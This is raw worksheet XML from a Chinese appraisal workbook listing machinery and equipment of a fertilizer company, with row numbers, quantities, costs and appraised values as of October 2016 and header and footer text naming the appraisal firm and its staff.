      <c r="K1135" s="116"/>
    </row>
    <row r="1136" customHeight="1" spans="2:11">
      <c r="B1136" s="93"/>
      <c r="C1136" s="93"/>
      <c r="D1136" s="106"/>
      <c r="E1136" s="106"/>
      <c r="F1136" s="106"/>
      <c r="G1136" s="93"/>
      <c r="H1136" s="107"/>
      <c r="I1136" s="93"/>
      <c r="J1136" s="93"/>
      <c r="K1136" s="116"/>
    </row>
    <row r="1137" customHeight="1" spans="2:11">
      <c r="B1137" s="93"/>
      <c r="C1137" s="93"/>
      <c r="D1137" s="106"/>
      <c r="E1137" s="106"/>
      <c r="F1137" s="106"/>
      <c r="G1137" s="93"/>
      <c r="H1137" s="107"/>
      <c r="I1137" s="93"/>
      <c r="J1137" s="93"/>
      <c r="K1137" s="116"/>
    </row>
    <row r="1138" customHeight="1" spans="2:11">
      <c r="B1138" s="93"/>
      <c r="C1138" s="93"/>
      <c r="D1138" s="106"/>
      <c r="E1138" s="106"/>
      <c r="F1138" s="106"/>
      <c r="G1138" s="93"/>
      <c r="H1138" s="107"/>
      <c r="I1138" s="93"/>
      <c r="J1138" s="93"/>
      <c r="K1138" s="116"/>
    </row>
    <row r="1139" customHeight="1" spans="2:11">
      <c r="B1139" s="93"/>
      <c r="C1139" s="93"/>
      <c r="D1139" s="106"/>
      <c r="E1139" s="106"/>
      <c r="F1139" s="106"/>
      <c r="G1139" s="93"/>
      <c r="H1139" s="107"/>
      <c r="I1139" s="93"/>
      <c r="J1139" s="93"/>
      <c r="K1139" s="116"/>
    </row>
    <row r="1140" customHeight="1" spans="2:11">
      <c r="B1140" s="93"/>
      <c r="C1140" s="93"/>
      <c r="D1140" s="106"/>
      <c r="E1140" s="106"/>
      <c r="F1140" s="106"/>
      <c r="G1140" s="93"/>
      <c r="H1140" s="107"/>
      <c r="I1140" s="93"/>
      <c r="J1140" s="93"/>
      <c r="K1140" s="116"/>
    </row>
  </sheetData>
  <mergeCells count="15">
    <mergeCell ref="B1:K1"/>
    <mergeCell ref="B3:C3"/>
    <mergeCell ref="D3:L3"/>
    <mergeCell ref="B111:D111"/>
    <mergeCell ref="B5:B6"/>
    <mergeCell ref="C5:C6"/>
    <mergeCell ref="D5:D6"/>
    <mergeCell ref="E5:E6"/>
    <mergeCell ref="F5:F6"/>
    <mergeCell ref="G5:G6"/>
    <mergeCell ref="H5:H6"/>
    <mergeCell ref="I5:I6"/>
    <mergeCell ref="J5:J6"/>
    <mergeCell ref="K5:K6"/>
    <mergeCell ref="L5:L6"/>
  </mergeCells>
  <pageMargins left="0.719444444444444" right="0.579861111111111" top="1.82986111111111" bottom="0.85" header="0.929861111111111" footer="0.559722222222222"/>
  <pageSetup paperSize="9" scale="75" orientation="landscape" horizontalDpi="600"/>
  <headerFooter alignWithMargins="0" scaleWithDoc="0">
    <oddHeader>&amp;L&amp;10
被评估单位（或者产权持有单位）：晋煤冀州银海化肥有限责任公司&amp;C&amp;"黑体,常规"&amp;18固定资产—机器设备评估明细表&amp;"宋体,常规"&amp;12
&amp;10评估基准日：2016年10月31日&amp;R&amp;10
表4-6-4
金额单位：人民币元</oddHeader>
    <oddFooter>&amp;L&amp;10评估单位:衡水正财资产评估有限公司&amp;C&amp;10评估人员：于红兵 郑国建 吴洁 贾佳 王文祥 程艳菊</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G12287"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B1" sqref="B1:L3"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="14.5" defaultRowHeight="24" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="14.5" style="26"/>
    <col min="2" max="2" width="5.625" style="26" customWidth="1"/>
    <col min="3" max="3" width="8.875" style="26" customWidth="1"/>
    <col min="4" max="4" width="28.625" style="63" customWidth="1"/>
    <col min="5" max="5" width="21.25" style="63" customWidth="1"/>
    <col min="6" max="6" width="6.5" style="26" customWidth="1"/>
    <col min="7" max="7" width="6.125" style="28" customWidth="1"/>
    <col min="8" max="8" width="10.875" style="26" customWidth="1"/>
    <col min="9" max="9" width="13.25" style="26" customWidth="1"/>
    <col min="10" max="10" width="13.25" style="64" customWidth="1"/>
    <col min="11" max="11" width="27.25" style="30" customWidth="1"/>
    <col min="12" max="12" width="14.5" style="26"/>
    <col min="13" max="13" width="18.375" style="26" customWidth="1"/>
    <col min="14" max="16384" width="14.5" style="26"/>
  </cols>
  <sheetData>
    <row r="1" customHeight="1" spans="1:13">
      <c r="A1" s="25"/>
      <c r="B1" s="3" t="s">
        <v>206</v>
      </c>
      <c r="C1" s="3"/>
      <c r="D1" s="3"/>
      <c r="E1" s="3"/>
      <c r="F1" s="3"/>
      <c r="G1" s="3"/>
      <c r="H1" s="3"/>
      <c r="I1" s="3"/>
      <c r="J1" s="3"/>
      <c r="K1" s="3"/>
      <c r="L1" s="1"/>
      <c r="M1" s="25"/>
    </row>
    <row r="2" customHeight="1" spans="1:13">
      <c r="A2" s="25"/>
      <c r="B2" s="1"/>
      <c r="C2" s="2"/>
      <c r="D2" s="2"/>
      <c r="E2" s="2"/>
      <c r="F2" s="2"/>
      <c r="G2" s="1"/>
      <c r="H2" s="1"/>
      <c r="I2" s="1"/>
      <c r="J2" s="1"/>
      <c r="K2" s="1"/>
      <c r="L2" s="1"/>
      <c r="M2" s="25"/>
    </row>
    <row r="3" customHeight="1" spans="1:13">
      <c r="A3" s="25"/>
      <c r="B3" s="4" t="s">
        <v>207</v>
      </c>
      <c r="C3" s="4"/>
      <c r="D3" s="5" t="s">
        <v>1361</v>
      </c>
      <c r="E3" s="5"/>
      <c r="F3" s="5"/>
      <c r="G3" s="5"/>
      <c r="H3" s="5"/>
      <c r="I3" s="5"/>
      <c r="J3" s="5"/>
      <c r="K3" s="5"/>
      <c r="L3" s="5"/>
      <c r="M3" s="25"/>
    </row>
    <row r="4" customHeight="1" spans="1:13">
      <c r="A4" s="25"/>
      <c r="B4" s="25"/>
      <c r="C4" s="25"/>
      <c r="D4" s="25"/>
      <c r="E4" s="25"/>
      <c r="F4" s="25"/>
      <c r="G4" s="25"/>
      <c r="H4" s="25"/>
      <c r="I4" s="25"/>
      <c r="J4" s="25"/>
      <c r="K4" s="25"/>
      <c r="L4" s="25"/>
      <c r="M4" s="25"/>
    </row>
    <row r="5" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A5" s="25"/>
      <c r="B5" s="31" t="s">
        <v>209</v>
      </c>
      <c r="C5" s="31" t="s">
        <v>2722</v>
      </c>
      <c r="D5" s="65" t="s">
        <v>211</v>
      </c>
      <c r="E5" s="65" t="s">
        <v>212</v>
      </c>
      <c r="F5" s="31" t="s">
        <v>214</v>
      </c>
      <c r="G5" s="33" t="s">
        <v>215</v>
      </c>
      <c r="H5" s="31" t="s">
        <v>216</v>
      </c>
      <c r="I5" s="46" t="s">
        <v>217</v>
      </c>
      <c r="J5" s="46" t="s">
        <v>218</v>
      </c>
      <c r="K5" s="31" t="s">
        <v>219</v>
      </c>
      <c r="L5" s="25"/>
      <c r="M5" s="25"/>
      <c r="N5" s="47"/>
      <c r="O5" s="47"/>
      <c r="P5" s="47"/>
      <c r="Q5" s="47"/>
      <c r="R5" s="47"/>
      <c r="S5" s="47"/>
      <c r="T5" s="47"/>
      <c r="U5" s="47"/>
      <c r="V5" s="47"/>
      <c r="W5" s="47"/>
      <c r="X5" s="47"/>
      <c r="Y5" s="47"/>
      <c r="Z5" s="47"/>
      <c r="AA5" s="47"/>
      <c r="AB5" s="47"/>
      <c r="AC5" s="47"/>
      <c r="AD5" s="47"/>
      <c r="AE5" s="47"/>
      <c r="AF5" s="47"/>
      <c r="AG5" s="47"/>
    </row>
    <row r="6" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A6" s="25"/>
      <c r="B6" s="31"/>
      <c r="C6" s="31"/>
      <c r="D6" s="65"/>
      <c r="E6" s="65"/>
      <c r="F6" s="31"/>
      <c r="G6" s="33"/>
      <c r="H6" s="31"/>
      <c r="I6" s="48"/>
      <c r="J6" s="48"/>
      <c r="K6" s="31"/>
      <c r="L6" s="25"/>
      <c r="M6" s="25"/>
      <c r="N6" s="47"/>
      <c r="O6" s="47"/>
      <c r="P6" s="47"/>
      <c r="Q6" s="47"/>
      <c r="R6" s="47"/>
      <c r="S6" s="47"/>
      <c r="T6" s="47"/>
      <c r="U6" s="47"/>
      <c r="V6" s="47"/>
      <c r="W6" s="47"/>
      <c r="X6" s="47"/>
      <c r="Y6" s="47"/>
      <c r="Z6" s="47"/>
      <c r="AA6" s="47"/>
      <c r="AB6" s="47"/>
      <c r="AC6" s="47"/>
      <c r="AD6" s="47"/>
      <c r="AE6" s="47"/>
      <c r="AF6" s="47"/>
      <c r="AG6" s="47"/>
    </row>
    <row r="7" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A7" s="25"/>
      <c r="B7" s="23">
        <v>43</v>
      </c>
      <c r="C7" s="257" t="s">
        <v>4150</v>
      </c>
      <c r="D7" s="258" t="s">
        <v>4151</v>
      </c>
      <c r="E7" s="258" t="s">
        <v>4152</v>
      </c>
      <c r="F7" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G7" s="36">
        <v>1</v>
      </c>
      <c r="H7" s="257" t="s">
        <v>962</v>
      </c>
      <c r="I7" s="67">
        <v>22000</v>
      </c>
      <c r="J7" s="50">
        <v>2640</v>
      </c>
      <c r="K7" s="259" t="s">
        <v>4153</v>
      </c>
      <c r="L7" s="25"/>
      <c r="M7" s="25"/>
      <c r="N7" s="47"/>
      <c r="O7" s="47"/>
      <c r="P7" s="47"/>
      <c r="Q7" s="47"/>
      <c r="R7" s="47"/>
      <c r="S7" s="47"/>
      <c r="T7" s="47"/>
      <c r="U7" s="47"/>
      <c r="V7" s="47"/>
      <c r="W7" s="47"/>
      <c r="X7" s="47"/>
      <c r="Y7" s="47"/>
      <c r="Z7" s="47"/>
      <c r="AA7" s="47"/>
      <c r="AB7" s="47"/>
      <c r="AC7" s="47"/>
      <c r="AD7" s="47"/>
      <c r="AE7" s="47"/>
      <c r="AF7" s="47"/>
      <c r="AG7" s="47"/>
    </row>
    <row r="8" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A8" s="25"/>
      <c r="B8" s="23">
        <v>44</v>
      </c>
      <c r="C8" s="257" t="s">
        <v>4154</v>
      </c>
      <c r="D8" s="258" t="s">
        <v>4155</v>
      </c>
      <c r="E8" s="66"/>
      <c r="F8" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G8" s="36">
        <v>1</v>
      </c>
      <c r="H8" s="257" t="s">
        <v>962</v>
      </c>
      <c r="I8" s="67">
        <v>15258.11</v>
      </c>
      <c r="J8" s="50">
        <v>4400</v>
      </c>
      <c r="K8" s="68"/>
      <c r="L8" s="47"/>
      <c r="M8" s="47"/>
      <c r="N8" s="47"/>
      <c r="O8" s="47"/>
      <c r="P8" s="47"/>
      <c r="Q8" s="47"/>
      <c r="R8" s="47"/>
      <c r="S8" s="47"/>
      <c r="T8" s="47"/>
      <c r="U8" s="47"/>
      <c r="V8" s="47"/>
      <c r="W8" s="47"/>
      <c r="X8" s="47"/>
      <c r="Y8" s="47"/>
      <c r="Z8" s="47"/>
      <c r="AA8" s="47"/>
      <c r="AB8" s="47"/>
      <c r="AC8" s="47"/>
      <c r="AD8" s="47"/>
      <c r="AE8" s="47"/>
      <c r="AF8" s="47"/>
      <c r="AG8" s="47"/>
    </row>
    <row r="9" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A9" s="25"/>
      <c r="B9" s="23">
        <v>45</v>
      </c>
      <c r="C9" s="257" t="s">
        <v>4156</v>
      </c>
      <c r="D9" s="258" t="s">
        <v>4157</v>
      </c>
      <c r="E9" s="258" t="s">
        <v>4158</v>
      </c>
      <c r="F9" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G9" s="36">
        <v>1</v>
      </c>
      <c r="H9" s="257" t="s">
        <v>871</v>
      </c>
      <c r="I9" s="67">
        <v>453248.81</v>
      </c>
      <c r="J9" s="50">
        <v>70400</v>
      </c>
      <c r="K9" s="259" t="s">
        <v>4159</v>
      </c>
      <c r="L9" s="47"/>
      <c r="M9" s="47"/>
      <c r="N9" s="47"/>
      <c r="O9" s="47"/>
      <c r="P9" s="47"/>
      <c r="Q9" s="47"/>
      <c r="R9" s="47"/>
      <c r="S9" s="47"/>
      <c r="T9" s="47"/>
      <c r="U9" s="47"/>
      <c r="V9" s="47"/>
      <c r="W9" s="47"/>
      <c r="X9" s="47"/>
      <c r="Y9" s="47"/>
      <c r="Z9" s="47"/>
      <c r="AA9" s="47"/>
      <c r="AB9" s="47"/>
      <c r="AC9" s="47"/>
      <c r="AD9" s="47"/>
      <c r="AE9" s="47"/>
      <c r="AF9" s="47"/>
      <c r="AG9" s="47"/>
    </row>
    <row r="10" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A10" s="25"/>
      <c r="B10" s="23">
        <v>47</v>
      </c>
      <c r="C10" s="257" t="s">
        <v>4160</v>
      </c>
      <c r="D10" s="258" t="s">
        <v>4161</v>
      </c>
      <c r="E10" s="258" t="s">
        <v>4162</v>
      </c>
      <c r="F10" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G10" s="36">
        <v>2</v>
      </c>
      <c r="H10" s="257" t="s">
        <v>965</v>
      </c>
      <c r="I10" s="67">
        <v>52000</v>
      </c>
      <c r="J10" s="50">
        <v>6000</v>
      </c>
      <c r="K10" s="68"/>
      <c r="L10" s="47"/>
      <c r="M10" s="47"/>
      <c r="N10" s="47"/>
      <c r="O10" s="47"/>
      <c r="P10" s="47"/>
      <c r="Q10" s="47"/>
      <c r="R10" s="47"/>
      <c r="S10" s="47"/>
      <c r="T10" s="47"/>
      <c r="U10" s="47"/>
      <c r="V10" s="47"/>
      <c r="W10" s="47"/>
      <c r="X10" s="47"/>
      <c r="Y10" s="47"/>
      <c r="Z10" s="47"/>
      <c r="AA10" s="47"/>
      <c r="AB10" s="47"/>
      <c r="AC10" s="47"/>
      <c r="AD10" s="47"/>
      <c r="AE10" s="47"/>
      <c r="AF10" s="47"/>
      <c r="AG10" s="47"/>
    </row>
    <row r="11" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A11" s="25"/>
      <c r="B11" s="23">
        <v>48</v>
      </c>
      <c r="C11" s="257" t="s">
        <v>4163</v>
      </c>
      <c r="D11" s="258" t="s">
        <v>3382</v>
      </c>
      <c r="E11" s="66"/>
      <c r="F11" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G11" s="36">
        <v>1</v>
      </c>
      <c r="H11" s="257" t="s">
        <v>965</v>
      </c>
      <c r="I11" s="67">
        <v>56000</v>
      </c>
      <c r="J11" s="50">
        <v>36000</v>
      </c>
      <c r="K11" s="259" t="s">
        <v>4164</v>
      </c>
      <c r="L11" s="47"/>
      <c r="M11" s="47"/>
      <c r="N11" s="47"/>
      <c r="O11" s="47"/>
      <c r="P11" s="47"/>
      <c r="Q11" s="47"/>
      <c r="R11" s="47"/>
      <c r="S11" s="47"/>
      <c r="T11" s="47"/>
      <c r="U11" s="47"/>
      <c r="V11" s="47"/>
      <c r="W11" s="47"/>
      <c r="X11" s="47"/>
      <c r="Y11" s="47"/>
      <c r="Z11" s="47"/>
      <c r="AA11" s="47"/>
      <c r="AB11" s="47"/>
      <c r="AC11" s="47"/>
      <c r="AD11" s="47"/>
      <c r="AE11" s="47"/>
      <c r="AF11" s="47"/>
      <c r="AG11" s="47"/>
    </row>
    <row r="12" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A12" s="25"/>
      <c r="B12" s="23">
        <v>53</v>
      </c>
      <c r="C12" s="257" t="s">
        <v>4165</v>
      </c>
      <c r="D12" s="258" t="s">
        <v>4166</v>
      </c>
      <c r="E12" s="258" t="s">
        <v>4152</v>
      </c>
      <c r="F12" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G12" s="36">
        <v>1</v>
      </c>
      <c r="H12" s="257" t="s">
        <v>3021</v>
      </c>
      <c r="I12" s="67">
        <v>17000</v>
      </c>
      <c r="J12" s="50">
        <v>2720</v>
      </c>
      <c r="K12" s="259" t="s">
        <v>4167</v>
      </c>
      <c r="L12" s="47"/>
      <c r="M12" s="47"/>
      <c r="N12" s="47"/>
      <c r="O12" s="47"/>
      <c r="P12" s="47"/>
      <c r="Q12" s="47"/>
      <c r="R12" s="47"/>
      <c r="S12" s="47"/>
      <c r="T12" s="47"/>
      <c r="U12" s="47"/>
      <c r="V12" s="47"/>
      <c r="W12" s="47"/>
      <c r="X12" s="47"/>
      <c r="Y12" s="47"/>
      <c r="Z12" s="47"/>
      <c r="AA12" s="47"/>
      <c r="AB12" s="47"/>
      <c r="AC12" s="47"/>
      <c r="AD12" s="47"/>
      <c r="AE12" s="47"/>
      <c r="AF12" s="47"/>
      <c r="AG12" s="47"/>
    </row>
    <row r="13" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A13" s="25"/>
      <c r="B13" s="23">
        <v>54</v>
      </c>
      <c r="C13" s="257" t="s">
        <v>4168</v>
      </c>
      <c r="D13" s="258" t="s">
        <v>4169</v>
      </c>
      <c r="E13" s="258" t="s">
        <v>4170</v>
      </c>
      <c r="F13" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G13" s="36">
        <v>5</v>
      </c>
      <c r="H13" s="257" t="s">
        <v>3021</v>
      </c>
      <c r="I13" s="67">
        <v>2171567.6</v>
      </c>
      <c r="J13" s="50">
        <v>453600</v>
      </c>
      <c r="K13" s="259" t="s">
        <v>4167</v>
      </c>
      <c r="L13" s="47"/>
      <c r="M13" s="47"/>
      <c r="N13" s="47"/>
      <c r="O13" s="47"/>
      <c r="P13" s="47"/>
      <c r="Q13" s="47"/>
      <c r="R13" s="47"/>
      <c r="S13" s="47"/>
      <c r="T13" s="47"/>
      <c r="U13" s="47"/>
      <c r="V13" s="47"/>
      <c r="W13" s="47"/>
      <c r="X13" s="47"/>
      <c r="Y13" s="47"/>
      <c r="Z13" s="47"/>
      <c r="AA13" s="47"/>
      <c r="AB13" s="47"/>
      <c r="AC13" s="47"/>
      <c r="AD13" s="47"/>
      <c r="AE13" s="47"/>
      <c r="AF13" s="47"/>
      <c r="AG13" s="47"/>
    </row>
    <row r="14" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A14" s="25"/>
      <c r="B14" s="23">
        <v>57</v>
      </c>
      <c r="C14" s="257" t="s">
        <v>4171</v>
      </c>
      <c r="D14" s="258" t="s">
        <v>2667</v>
      </c>
      <c r="E14" s="258" t="s">
        <v>4172</v>
      </c>
      <c r="F14" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G14" s="36">
        <v>3</v>
      </c>
      <c r="H14" s="257" t="s">
        <v>3021</v>
      </c>
      <c r="I14" s="67">
        <v>61120</v>
      </c>
      <c r="J14" s="50">
        <v>8640</v>
      </c>
      <c r="K14" s="259" t="s">
        <v>4167</v>
      </c>
      <c r="L14" s="25"/>
      <c r="M14" s="25"/>
      <c r="N14" s="47"/>
      <c r="O14" s="47"/>
      <c r="P14" s="47"/>
      <c r="Q14" s="47"/>
      <c r="R14" s="47"/>
      <c r="S14" s="47"/>
      <c r="T14" s="47"/>
      <c r="U14" s="47"/>
      <c r="V14" s="47"/>
      <c r="W14" s="47"/>
      <c r="X14" s="47"/>
      <c r="Y14" s="47"/>
      <c r="Z14" s="47"/>
      <c r="AA14" s="47"/>
      <c r="AB14" s="47"/>
      <c r="AC14" s="47"/>
      <c r="AD14" s="47"/>
      <c r="AE14" s="47"/>
      <c r="AF14" s="47"/>
      <c r="AG14" s="47"/>
    </row>
    <row r="15" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A15" s="25"/>
      <c r="B15" s="23">
        <v>65</v>
      </c>
      <c r="C15" s="257" t="s">
        <v>4173</v>
      </c>
      <c r="D15" s="258" t="s">
        <v>4174</v>
      </c>
      <c r="E15" s="258" t="s">
        <v>4175</v>
      </c>
      <c r="F15" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G15" s="36">
        <v>1</v>
      </c>
      <c r="H15" s="257" t="s">
        <v>3041</v>
      </c>
      <c r="I15" s="67">
        <v>3800</v>
      </c>
      <c r="J15" s="50">
        <v>896</v>
      </c>
      <c r="K15" s="68"/>
      <c r="L15" s="25"/>
      <c r="M15" s="25"/>
      <c r="N15" s="47"/>
      <c r="O15" s="47"/>
      <c r="P15" s="47"/>
      <c r="Q15" s="47"/>
      <c r="R15" s="47"/>
      <c r="S15" s="47"/>
      <c r="T15" s="47"/>
      <c r="U15" s="47"/>
      <c r="V15" s="47"/>
      <c r="W15" s="47"/>
      <c r="X15" s="47"/>
      <c r="Y15" s="47"/>
      <c r="Z15" s="47"/>
      <c r="AA15" s="47"/>
      <c r="AB15" s="47"/>
      <c r="AC15" s="47"/>
      <c r="AD15" s="47"/>
      <c r="AE15" s="47"/>
      <c r="AF15" s="47"/>
      <c r="AG15" s="47"/>
    </row>
    <row r="16" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A16" s="25"/>
      <c r="B16" s="23">
        <v>82</v>
      </c>
      <c r="C16" s="257" t="s">
        <v>4176</v>
      </c>
      <c r="D16" s="258" t="s">
        <v>3228</v>
      </c>
      <c r="E16" s="258" t="s">
        <v>4177</v>
      </c>
      <c r="F16" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G16" s="36">
        <v>2</v>
      </c>
      <c r="H16" s="257" t="s">
        <v>1035</v>
      </c>
      <c r="I16" s="67">
        <v>620000</v>
      </c>
      <c r="J16" s="50">
        <v>120000</v>
      </c>
      <c r="K16" s="259" t="s">
        <v>4164</v>
      </c>
      <c r="L16" s="25"/>
      <c r="M16" s="25"/>
      <c r="N16" s="47"/>
      <c r="O16" s="47"/>
      <c r="P16" s="47"/>
      <c r="Q16" s="47"/>
      <c r="R16" s="47"/>
      <c r="S16" s="47"/>
      <c r="T16" s="47"/>
      <c r="U16" s="47"/>
      <c r="V16" s="47"/>
      <c r="W16" s="47"/>
      <c r="X16" s="47"/>
      <c r="Y16" s="47"/>
      <c r="Z16" s="47"/>
      <c r="AA16" s="47"/>
      <c r="AB16" s="47"/>
      <c r="AC16" s="47"/>
      <c r="AD16" s="47"/>
      <c r="AE16" s="47"/>
      <c r="AF16" s="47"/>
      <c r="AG16" s="47"/>
    </row>
    <row r="17" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A17" s="25"/>
      <c r="B17" s="23">
        <v>83</v>
      </c>
      <c r="C17" s="257" t="s">
        <v>4178</v>
      </c>
      <c r="D17" s="258" t="s">
        <v>334</v>
      </c>
      <c r="E17" s="258" t="s">
        <v>4179</v>
      </c>
      <c r="F17" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G17" s="36">
        <v>1</v>
      </c>
      <c r="H17" s="257" t="s">
        <v>273</v>
      </c>
      <c r="I17" s="67">
        <v>358000</v>
      </c>
      <c r="J17" s="50">
        <v>39200</v>
      </c>
      <c r="K17" s="259" t="s">
        <v>4164</v>
      </c>
      <c r="L17" s="47"/>
      <c r="M17" s="47"/>
      <c r="N17" s="47"/>
      <c r="O17" s="47"/>
      <c r="P17" s="47"/>
      <c r="Q17" s="47"/>
      <c r="R17" s="47"/>
      <c r="S17" s="47"/>
      <c r="T17" s="47"/>
      <c r="U17" s="47"/>
      <c r="V17" s="47"/>
      <c r="W17" s="47"/>
      <c r="X17" s="47"/>
      <c r="Y17" s="47"/>
      <c r="Z17" s="47"/>
      <c r="AA17" s="47"/>
      <c r="AB17" s="47"/>
      <c r="AC17" s="47"/>
      <c r="AD17" s="47"/>
      <c r="AE17" s="47"/>
      <c r="AF17" s="47"/>
      <c r="AG17" s="47"/>
    </row>
    <row r="18" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A18" s="25"/>
      <c r="B18" s="23">
        <v>84</v>
      </c>
      <c r="C18" s="257" t="s">
        <v>4180</v>
      </c>
      <c r="D18" s="258" t="s">
        <v>4181</v>
      </c>
      <c r="E18" s="66"/>
      <c r="F18" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G18" s="36">
        <v>2</v>
      </c>
      <c r="H18" s="257" t="s">
        <v>310</v>
      </c>
      <c r="I18" s="67">
        <v>290000</v>
      </c>
      <c r="J18" s="50">
        <v>240</v>
      </c>
      <c r="K18" s="259" t="s">
        <v>4153</v>
      </c>
      <c r="L18" s="47"/>
      <c r="M18" s="47"/>
      <c r="N18" s="47"/>
      <c r="O18" s="47"/>
      <c r="P18" s="47"/>
      <c r="Q18" s="47"/>
      <c r="R18" s="47"/>
      <c r="S18" s="47"/>
      <c r="T18" s="47"/>
      <c r="U18" s="47"/>
      <c r="V18" s="47"/>
      <c r="W18" s="47"/>
      <c r="X18" s="47"/>
      <c r="Y18" s="47"/>
      <c r="Z18" s="47"/>
      <c r="AA18" s="47"/>
      <c r="AB18" s="47"/>
      <c r="AC18" s="47"/>
      <c r="AD18" s="47"/>
      <c r="AE18" s="47"/>
      <c r="AF18" s="47"/>
      <c r="AG18" s="47"/>
    </row>
    <row r="19" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A19" s="25"/>
      <c r="B19" s="23">
        <v>86</v>
      </c>
      <c r="C19" s="257" t="s">
        <v>4182</v>
      </c>
      <c r="D19" s="258" t="s">
        <v>4183</v>
      </c>
      <c r="E19" s="258" t="s">
        <v>4184</v>
      </c>
      <c r="F19" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G19" s="36">
        <v>1</v>
      </c>
      <c r="H19" s="257" t="s">
        <v>310</v>
      </c>
      <c r="I19" s="67">
        <v>5200</v>
      </c>
      <c r="J19" s="50">
        <v>1040</v>
      </c>
      <c r="K19" s="259" t="s">
        <v>4167</v>
      </c>
      <c r="L19" s="47"/>
      <c r="M19" s="47"/>
      <c r="N19" s="47"/>
      <c r="O19" s="47"/>
      <c r="P19" s="47"/>
      <c r="Q19" s="47"/>
      <c r="R19" s="47"/>
      <c r="S19" s="47"/>
      <c r="T19" s="47"/>
      <c r="U19" s="47"/>
      <c r="V19" s="47"/>
      <c r="W19" s="47"/>
      <c r="X19" s="47"/>
      <c r="Y19" s="47"/>
      <c r="Z19" s="47"/>
      <c r="AA19" s="47"/>
      <c r="AB19" s="47"/>
      <c r="AC19" s="47"/>
      <c r="AD19" s="47"/>
      <c r="AE19" s="47"/>
      <c r="AF19" s="47"/>
      <c r="AG19" s="47"/>
    </row>
    <row r="20" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A20" s="25"/>
      <c r="B20" s="23">
        <v>87</v>
      </c>
      <c r="C20" s="257" t="s">
        <v>4185</v>
      </c>
      <c r="D20" s="258" t="s">
        <v>4183</v>
      </c>
      <c r="E20" s="258" t="s">
        <v>4186</v>
      </c>
      <c r="F20" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G20" s="36">
        <v>1</v>
      </c>
      <c r="H20" s="257" t="s">
        <v>310</v>
      </c>
      <c r="I20" s="67">
        <v>4800</v>
      </c>
      <c r="J20" s="50">
        <v>960</v>
      </c>
      <c r="K20" s="259" t="s">
        <v>4167</v>
      </c>
      <c r="L20" s="47"/>
      <c r="M20" s="47"/>
      <c r="N20" s="47"/>
      <c r="O20" s="47"/>
      <c r="P20" s="47"/>
      <c r="Q20" s="47"/>
      <c r="R20" s="47"/>
      <c r="S20" s="47"/>
      <c r="T20" s="47"/>
      <c r="U20" s="47"/>
      <c r="V20" s="47"/>
      <c r="W20" s="47"/>
      <c r="X20" s="47"/>
      <c r="Y20" s="47"/>
      <c r="Z20" s="47"/>
      <c r="AA20" s="47"/>
      <c r="AB20" s="47"/>
      <c r="AC20" s="47"/>
      <c r="AD20" s="47"/>
      <c r="AE20" s="47"/>
      <c r="AF20" s="47"/>
      <c r="AG20" s="47"/>
    </row>
    <row r="21" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A21" s="25"/>
      <c r="B21" s="23">
        <v>88</v>
      </c>
      <c r="C21" s="257" t="s">
        <v>4187</v>
      </c>
      <c r="D21" s="258" t="s">
        <v>334</v>
      </c>
      <c r="E21" s="258" t="s">
        <v>4188</v>
      </c>
      <c r="F21" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G21" s="36">
        <v>2</v>
      </c>
      <c r="H21" s="257" t="s">
        <v>326</v>
      </c>
      <c r="I21" s="67">
        <v>15600</v>
      </c>
      <c r="J21" s="50">
        <v>1248</v>
      </c>
      <c r="K21" s="259" t="s">
        <v>4167</v>
      </c>
      <c r="L21" s="47"/>
      <c r="M21" s="47"/>
      <c r="N21" s="47"/>
      <c r="O21" s="47"/>
      <c r="P21" s="47"/>
      <c r="Q21" s="47"/>
      <c r="R21" s="47"/>
      <c r="S21" s="47"/>
      <c r="T21" s="47"/>
      <c r="U21" s="47"/>
      <c r="V21" s="47"/>
      <c r="W21" s="47"/>
      <c r="X21" s="47"/>
      <c r="Y21" s="47"/>
      <c r="Z21" s="47"/>
      <c r="AA21" s="47"/>
      <c r="AB21" s="47"/>
      <c r="AC21" s="47"/>
      <c r="AD21" s="47"/>
      <c r="AE21" s="47"/>
      <c r="AF21" s="47"/>
      <c r="AG21" s="47"/>
    </row>
    <row r="22" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A22" s="25"/>
      <c r="B22" s="23">
        <v>91</v>
      </c>
      <c r="C22" s="257" t="s">
        <v>4189</v>
      </c>
      <c r="D22" s="258" t="s">
        <v>334</v>
      </c>
      <c r="E22" s="258" t="s">
        <v>4190</v>
      </c>
      <c r="F22" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G22" s="36">
        <v>1</v>
      </c>
      <c r="H22" s="257" t="s">
        <v>326</v>
      </c>
      <c r="I22" s="67">
        <v>9728</v>
      </c>
      <c r="J22" s="50">
        <v>720</v>
